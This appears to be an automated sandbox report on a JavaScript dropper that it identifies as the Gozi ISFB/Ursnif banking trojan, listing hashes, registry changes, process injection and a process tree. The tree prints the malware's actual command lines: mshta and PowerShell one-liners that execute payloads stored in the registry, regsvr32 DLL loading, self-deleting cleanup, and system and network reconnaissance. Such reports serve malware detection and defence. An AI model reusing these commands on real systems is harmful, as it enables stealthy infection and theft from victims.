gozi_ifsb | 77ce825e2c50017520147fce8c85173fd63077ef97a07097b53ec61df9048b83

Analysis

max time kernel
150s
max time network
136s
platform
windows10_x64
resource
win10v200430
submitted
02-06-2020 20:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

my_presentation_q2n.js
Size

1.3MB
MD5

3bfdc69fe78e172ffe8c054d36596163
SHA1

ecddf99225e7fb6940270ef115b5c275f48e5f0b
SHA256

77ce825e2c50017520147fce8c85173fd63077ef97a07097b53ec61df9048b83
SHA512

456162fff6f4c83df925fd2ead41c24001d1ab2982f7a8bc740b7d051e1697899fe24959ebb23569a40fead8e905becdd7786fad28a651cc73baa73f885864ce

Score

10^/10

banker trojan gozi_ifsb ursnif spyware discovery

Malware Config

Signatures

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b05717092b39d601	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "371745553"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4180DB4C-A51E-11EA-BF1A-5E6646994EA9} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 607e670a2b39d601	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30816555"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30816555"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000070f4e65ddf1514459006b313b316c0200000000002000000000010660000000100002000000030d3f726168dfda0020ae1ee460a9c9b9bb941066cf9d89c9990332296c1300f000000000e8000000002000020000000764eea929d13c10fa61d9e783e8ea622515a02513bf9305697905d73bbf5b6a72000000086943d69f2cde588bc07769bdbf9a3f6506283cd0d38db6e2960c37b85eb45ed400000000c0c31be8605938a1102e433545b7971cfb8e08f5659baaf4981754c0f6055e829ddedf29112b3e2fe2170831b1bf95042fbe8ad419edbd35ed18e7a93b33144	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30816555"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "371745553"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000070f4e65ddf1514459006b313b316c0200000000002000000000010660000000100002000000056a53973d91dca2a061409d0e7f778a2ea63255a5a81627047eba4bb0dcc0ad6000000000e8000000002000020000000a552018ba6a66108ca62fcd0fd0fa3fb68915acf1cfb75a34a25a2ee3fd7e7bd2000000075b035aa0ef7ef3c1a160e8f3e53a5af3bf91443bb946363b550ea0ac4c4a61e400000003ebe449a8e6acb63f00bea4d546cb5022a99a806e929cc02de9546edc9ba60c7c38fb56a41f231dcf9d41e508a9e334e6af07ed9d1d414bd73d11e43d8dfd6ab	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "388778016"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

4068 PING.EXE
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

3836 net.exe
Ursnif, Dreambot
Ursnif is a variant of the Gozi IFSB with more capabilities.
banker trojan ursnif
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

904 regsvr32.exe
Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

iexplore.exe

pid process

3916 iexplore.exe
3916 iexplore.exe
3916 iexplore.exe

pid	process
4068	PING.EXE

pid	process
3836	net.exe

pid	process
904	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 1589 IoCs

Processes:

powershell.exeExplorer.EXE

pid	process
3812	powershell.exe
3812	powershell.exe
3812	powershell.exe
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE
2988	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

3812 powershell.exe
2988 Explorer.EXE
2988 Explorer.EXE
2988 Explorer.EXE
3636 cmd.exe
2988 Explorer.EXE

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3812 set thread context of 2988	3812	powershell.exe	Explorer.EXE
PID 2988 set thread context of 3436	2988	Explorer.EXE	RuntimeBroker.exe
PID 2988 set thread context of 3636	2988	Explorer.EXE	cmd.exe
PID 2988 set thread context of 3916	2988	Explorer.EXE	iexplore.exe
PID 3636 set thread context of 4068	3636	cmd.exe	PING.EXE
PID 2988 set thread context of 1236	2988	Explorer.EXE	WinMail.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

3144 systeminfo.exe
Runs net.exe

pid	process
3144	systeminfo.exe

Checks whether UAC is enabled 3 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 75 IoCs

Processes:

wscript.exeregsvr32.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2916 wrote to memory of 796	2916	wscript.exe	regsvr32.exe
PID 2916 wrote to memory of 796	2916	wscript.exe	regsvr32.exe
PID 796 wrote to memory of 904	796	regsvr32.exe	regsvr32.exe
PID 796 wrote to memory of 904	796	regsvr32.exe	regsvr32.exe
PID 796 wrote to memory of 904	796	regsvr32.exe	regsvr32.exe
PID 3916 wrote to memory of 3936	3916	iexplore.exe	IEXPLORE.EXE
PID 3916 wrote to memory of 3936	3916	iexplore.exe	IEXPLORE.EXE
PID 3916 wrote to memory of 3936	3916	iexplore.exe	IEXPLORE.EXE
PID 3916 wrote to memory of 3704	3916	iexplore.exe	IEXPLORE.EXE
PID 3916 wrote to memory of 3704	3916	iexplore.exe	IEXPLORE.EXE
PID 3916 wrote to memory of 3704	3916	iexplore.exe	IEXPLORE.EXE
PID 3808 wrote to memory of 3812	3808	mshta.exe	powershell.exe
PID 3808 wrote to memory of 3812	3808	mshta.exe	powershell.exe
PID 3812 wrote to memory of 2284	3812	powershell.exe	csc.exe
PID 3812 wrote to memory of 2284	3812	powershell.exe	csc.exe
PID 2284 wrote to memory of 840	2284	csc.exe	cvtres.exe
PID 2284 wrote to memory of 840	2284	csc.exe	cvtres.exe
PID 3812 wrote to memory of 1524	3812	powershell.exe	csc.exe
PID 3812 wrote to memory of 1524	3812	powershell.exe	csc.exe
PID 1524 wrote to memory of 3768	1524	csc.exe	cvtres.exe
PID 1524 wrote to memory of 3768	1524	csc.exe	cvtres.exe
PID 3812 wrote to memory of 2988	3812	powershell.exe	Explorer.EXE
PID 3812 wrote to memory of 2988	3812	powershell.exe	Explorer.EXE
PID 3812 wrote to memory of 2988	3812	powershell.exe	Explorer.EXE
PID 2988 wrote to memory of 3636	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 3636	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 3636	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 3436	2988	Explorer.EXE	RuntimeBroker.exe
PID 2988 wrote to memory of 3436	2988	Explorer.EXE	RuntimeBroker.exe
PID 2988 wrote to memory of 3636	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 3436	2988	Explorer.EXE	RuntimeBroker.exe
PID 2988 wrote to memory of 3916	2988	Explorer.EXE	iexplore.exe
PID 2988 wrote to memory of 3636	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 3916	2988	Explorer.EXE	iexplore.exe
PID 2988 wrote to memory of 3916	2988	Explorer.EXE	iexplore.exe
PID 3636 wrote to memory of 4068	3636	cmd.exe	PING.EXE
PID 2988 wrote to memory of 992	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 992	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 556	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 556	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 840	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 840	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 2680	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 2680	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 1236	2988	Explorer.EXE	WinMail.exe
PID 2988 wrote to memory of 1236	2988	Explorer.EXE	WinMail.exe
PID 2988 wrote to memory of 1236	2988	Explorer.EXE	WinMail.exe
PID 2988 wrote to memory of 1236	2988	Explorer.EXE	WinMail.exe
PID 2988 wrote to memory of 1236	2988	Explorer.EXE	WinMail.exe
PID 2988 wrote to memory of 1284	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 1284	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 3480	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 3480	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 4068	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 4068	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 3076	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 3076	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 840	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 840	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 556	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 556	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 1488	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 1488	2988	Explorer.EXE	cmd.exe
PID 2988 wrote to memory of 2648	2988	Explorer.EXE	cmd.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

powershell.exeExplorer.EXEtasklist.exe

description	pid	process
Token: SeDebugPrivilege	3812	powershell.exe
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeDebugPrivilege	2860	tasklist.exe
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE
Token: SeShutdownPrivilege	2988	Explorer.EXE
Token: SeCreatePagefilePrivilege	2988	Explorer.EXE

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

2860 tasklist.exe

pid	process
2860	tasklist.exe

Checks for installed software on the system 1 TTPs 21 IoCs

discovery

Query Registry

T1012

Processes:

reg.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}\DisplayName	reg.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid	process
3916	iexplore.exe
3916	iexplore.exe
3936	IEXPLORE.EXE
3936	IEXPLORE.EXE
3916	iexplore.exe
3916	iexplore.exe
3704	IEXPLORE.EXE
3704	IEXPLORE.EXE
3916	iexplore.exe
3916	iexplore.exe
3936	IEXPLORE.EXE
3936	IEXPLORE.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4068 PING.EXE

pid	process
4068	PING.EXE

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:2988
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\my_presentation_q2n.js
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\System32\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\\tmDvhuQzZOS.txt
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:796
  - - C:\Windows\SysWOW64\regsvr32.exe
      -s C:\Users\Admin\AppData\Local\Temp\\tmDvhuQzZOS.txt
      4⤵
      Loads dropped DLL
      PID:904
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\28FFF86C-67D8-9AFA-31DC-8B6EF5D0EF82\\\AxInrvps'));if(!window.flag)close()</script>"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\28FFF86C-67D8-9AFA-31DC-8B6EF5D0EF82").AppCbcd))
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    PID:3812
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3zhurldx\3zhurldx.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2284
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F2D.tmp" "c:\Users\Admin\AppData\Local\Temp\3zhurldx\CSCE38C92F59F4B4FAE82139A95B4939D2A.TMP"
        5⤵
        
        PID:840
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i2epcu0k\i2epcu0k.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1524
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6008.tmp" "c:\Users\Admin\AppData\Local\Temp\i2epcu0k\CSC21640062A67B437E8C72141E358E19C4.TMP"
        5⤵
        
        PID:3768
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\tmDvhuQzZOS.txt"
  2⤵
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3636
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Runs ping.exe
    PID:4068
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\418E.bi1"
  2⤵
  PID:556
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:1300
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\411A.bi1"
  2⤵
  PID:992
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:2664
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\418E.bi1"
  2⤵
  PID:840
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\411A.bi1"
  2⤵
  PID:2680
- C:\Program Files\Windows Mail\WinMail.exe
  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
  2⤵
  PID:1236
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:1284
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:3144
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:3480
- C:\Windows\system32\cmd.exe
  cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:4068
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:3836
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:3076
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:840
- - C:\Windows\system32\nslookup.exe
    nslookup 127.0.0.1
    3⤵
    PID:3880
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:556
- C:\Windows\system32\cmd.exe
  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:1488
- - C:\Windows\system32\tasklist.exe
    tasklist.exe /SVC
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Enumerates processes with tasklist
    PID:2860
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\19AD.bin1"
  2⤵
  PID:2648
